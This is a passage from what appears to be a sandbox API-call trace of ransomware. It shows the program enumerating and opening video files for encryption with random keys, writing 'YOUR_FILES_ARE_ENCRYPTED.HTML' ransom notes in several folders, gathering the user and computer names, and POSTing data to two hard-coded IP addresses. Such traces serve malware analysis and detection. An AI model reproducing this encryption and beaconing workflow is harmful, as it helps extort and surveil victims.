RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.521] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\xe8lKRUdBak-DlNI7s4.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\xe8lkrudbak-dlni7s4.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0125.521] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=18063) returned 1 [0125.521] GetProcessHeap () returned 0x600000 [0125.521] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0125.522] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="D6") returned 2 [0125.522] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="9D") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="21") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="54") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="E4") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="CF") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="46") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="EA") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="15") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="26") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="BC") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="F3") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="16") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="28") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="9F") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="D4") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="10") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="F4") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="3F") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="59") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="AD") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="71") returned 2 [0125.522] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="0D") returned 2 [0125.523] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="0D") returned 2 [0125.523] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="C5") returned 2 [0125.523] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="25") returned 2 [0125.523] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="04") returned 2 [0125.523] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="55") returned 2 [0125.523] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="CA") returned 2 [0125.523] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="4D") returned 2 [0125.523] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="B0") returned 2 [0125.523] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="2C") returned 2 [0125.523] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\xe8lKRUdBak-DlNI7s4.avi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\xe8lKRUdBak-DlNI7s4.avi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\xe8lKRUdBak-DlNI7s4.avi" [0125.523] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.523] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0125.524] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52198820, ftCreationTime.dwHighDateTime=0x1d70216, ftLastAccessTime.dwLowDateTime=0x1a937810, ftLastAccessTime.dwHighDateTime=0x1d70500, ftLastWriteTime.dwLowDateTime=0x1a937810, ftLastWriteTime.dwHighDateTime=0x1d70500, nFileSizeHigh=0x0, nFileSizeLow=0xc88d, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="yV4Uu.mp4", cAlternateFileName="")) returned 1 [0125.524] StrStrIW (lpFirst="yV4Uu.mp4", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.524] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\yV4Uu.mp4") returned 42 [0125.524] PathFindExtensionW (pszPath="yV4Uu.mp4") returned=".mp4" [0125.524] lstrlenW (lpString=".mp4") returned 4 [0125.524] PathFindExtensionW (pszPath="yV4Uu.mp4") returned=".mp4" [0125.524] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\yV4Uu.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\yv4uu.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0125.528] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=51341) returned 1 [0125.528] GetProcessHeap () returned 0x600000 [0125.528] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0125.529] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="EA") returned 2 [0125.529] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="A2") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="AF") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="CB") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="8C") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="2C") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="4A") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="0B") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="9F") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="B4") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="14") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="E1") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="A5") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="4B") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="82") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="91") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="F1") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="6E") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="42") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="48") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="0C") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="27") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="53") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="89") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="9F") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="C7") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="1C") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="98") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="50") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="B1") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="F5") returned 2 [0125.530] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="2A") returned 2 [0125.531] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\yV4Uu.mp4" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\yV4Uu.mp4") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\yV4Uu.mp4" [0125.531] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.531] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0125.533] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf368ae20, ftCreationTime.dwHighDateTime=0x1d70862, ftLastAccessTime.dwLowDateTime=0x8875f9c0, ftLastAccessTime.dwHighDateTime=0x1d70947, ftLastWriteTime.dwLowDateTime=0x8875f9c0, ftLastWriteTime.dwHighDateTime=0x1d70947, nFileSizeHigh=0x0, nFileSizeLow=0xfab9, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="_4xrJjlhRUi.flv", cAlternateFileName="_4XRJJ~1.FLV")) returned 1 [0125.533] StrStrIW (lpFirst="_4xrJjlhRUi.flv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.533] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\_4xrJjlhRUi.flv") returned 48 [0125.533] PathFindExtensionW (pszPath="_4xrJjlhRUi.flv") returned=".flv" [0125.533] lstrlenW (lpString=".flv") returned 4 [0125.533] PathFindExtensionW (pszPath="_4xrJjlhRUi.flv") returned=".flv" [0125.533] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0125.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\_4xrJjlhRUi.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\_4xrjjlhrui.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0125.536] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=64185) returned 1 [0125.536] GetProcessHeap () returned 0x600000 [0125.536] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0125.537] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="62") returned 2 [0125.537] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="4F") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="A8") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="87") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="87") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="94") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="01") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="F8") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="AC") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="FC") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="AA") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="D4") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="23") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="46") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="19") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="32") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="4A") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="DC") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="9C") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="6B") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="02") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="4C") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="3F") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="50") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="20") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="B7") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="DD") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="CC") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="FE") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="8B") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="59") returned 2 [0125.537] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="7B") returned 2 [0125.538] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\_4xrJjlhRUi.flv" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\_4xrJjlhRUi.flv") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\_4xrJjlhRUi.flv" [0125.538] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.538] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0125.541] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf368ae20, ftCreationTime.dwHighDateTime=0x1d70862, ftLastAccessTime.dwLowDateTime=0x8875f9c0, ftLastAccessTime.dwHighDateTime=0x1d70947, ftLastWriteTime.dwLowDateTime=0x8875f9c0, ftLastWriteTime.dwHighDateTime=0x1d70947, nFileSizeHigh=0x0, nFileSizeLow=0xfab9, dwReserved0=0x19eee8, dwReserved1=0x7784abfa, cFileName="_4xrJjlhRUi.flv", cAlternateFileName="_4XRJJ~1.FLV")) returned 0 [0125.541] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0125.541] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0125.541] GetProcessHeap () returned 0x600000 [0125.541] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0125.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0125.542] WriteFile (in: hFile=0x314, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0125.543] CloseHandle (hObject=0x314) returned 1 [0125.543] GetProcessHeap () returned 0x600000 [0125.544] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0125.544] GetProcessHeap () returned 0x600000 [0125.578] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0125.578] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x528cdabb, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x528cdabb, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Videos", cAlternateFileName="")) returned 0 [0125.578] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0125.578] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 55 [0125.578] GetProcessHeap () returned 0x600000 [0125.578] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3173dd8 [0125.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0125.580] WriteFile (in: hFile=0x300, lpBuffer=0x3173dd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x3173dd8*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0125.581] CloseHandle (hObject=0x300) returned 1 [0125.581] GetProcessHeap () returned 0x600000 [0125.581] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0125.581] GetProcessHeap () returned 0x600000 [0125.581] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0125.582] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0 [0125.582] FindClose (in: hFindFile=0x6266b8 | out: hFindFile=0x6266b8) returned 1 [0125.582] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 42 [0125.582] GetProcessHeap () returned 0x600000 [0125.582] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0125.582] CreateFileW (lpFileName="\\\\?\\C:\\Users\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0125.583] WriteFile (in: hFile=0x2fc, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f708, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19f708*=0x3c00, lpOverlapped=0x0) returned 1 [0125.600] CloseHandle (hObject=0x2fc) returned 1 [0125.600] GetProcessHeap () returned 0x600000 [0125.600] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0125.600] GetProcessHeap () returned 0x600000 [0125.600] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0125.601] FindNextFileW (in: hFindFile=0x6269f8, lpFindFileData=0x19f750 | out: lpFindFileData=0x19f750*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f7ac, cFileName="Windows", cAlternateFileName="")) returned 1 [0125.601] FindNextFileW (in: hFindFile=0x6269f8, lpFindFileData=0x19f750 | out: lpFindFileData=0x19f750*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f7ac, cFileName="Windows", cAlternateFileName="")) returned 0 [0125.601] FindClose (in: hFindFile=0x6269f8 | out: hFindFile=0x6269f8) returned 1 [0125.601] wnsprintfW (in: pszDest=0x650330, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 36 [0125.602] GetProcessHeap () returned 0x600000 [0125.602] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6dd4e0 [0125.602] CreateFileW (lpFileName="\\\\?\\C:\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0125.603] WriteFile (in: hFile=0x2f4, lpBuffer=0x6dd4e0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19fa1c, lpOverlapped=0x0 | out: lpBuffer=0x6dd4e0*, lpNumberOfBytesWritten=0x19fa1c*=0x3c00, lpOverlapped=0x0) returned 1 [0125.604] CloseHandle (hObject=0x2f4) returned 1 [0125.604] GetProcessHeap () returned 0x600000 [0125.604] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0125.604] GetProcessHeap () returned 0x600000 [0125.604] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x650330 | out: hHeap=0x600000) returned 1 [0125.605] GetProcessHeap () returned 0x600000 [0125.605] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x640328 | out: hHeap=0x600000) returned 1 [0125.605] Sleep (dwMilliseconds=0x1388) [0130.607] GetUserNameExA (in: NameFormat=0x1, lpNameBuffer=0x19f600, nSize=0x19fa64 | out: lpNameBuffer="", nSize=0x19fa64) returned 0x0 [0130.611] GetUserNameA (in: lpBuffer=0x19f600, pcbBuffer=0x19fa60 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fa60) returned 1 [0130.612] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x19f200, nSize=0x19fa64 | out: lpBuffer="xc64ZB", nSize=0x19fa64) returned 1 [0130.614] GetProcessHeap () returned 0x600000 [0130.614] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x75) returned 0x60f2e0 [0130.614] InternetCrackUrlA (in: lpszUrl="http://91.218.114.31", dwUrlLength=0x14, dwFlags=0x0, lpUrlComponents=0x19f184 | out: lpUrlComponents=0x19f184) returned 1 [0130.977] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36 Edg/84.0.522.40", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0131.556] InternetConnectA (hInternet=0xcc0004, lpszServerName="91.218.114.31", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0131.557] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84083100, dwContext=0x0) returned 0xcc000c [0131.557] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x60f2e0*, dwOptionalLength=0x74) returned 0 [0133.270] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0133.271] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0133.271] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0133.271] InternetCrackUrlA (in: lpszUrl="http://91.218.114.30", dwUrlLength=0x14, dwFlags=0x0, lpUrlComponents=0x19f184 | out: lpUrlComponents=0x19f184) returned 1 [0133.271] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36 Edg/84.0.522.40", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0133.271] InternetConnectA (hInternet=0xcc0004, lpszServerName="91.218.114.30", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0133.271] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84083100, dwContext=0x0) returned 0xcc000c [0133.271] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x60f2e0*, dwOptionalLength=0x74) returned 0 [0134.466] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0134.466] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0134.466] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0134.466] GetProcessHeap () returned 0x600000 [0134.466] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x60f2e0 | out: hHeap=0x600000) returned 1 [0134.466] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 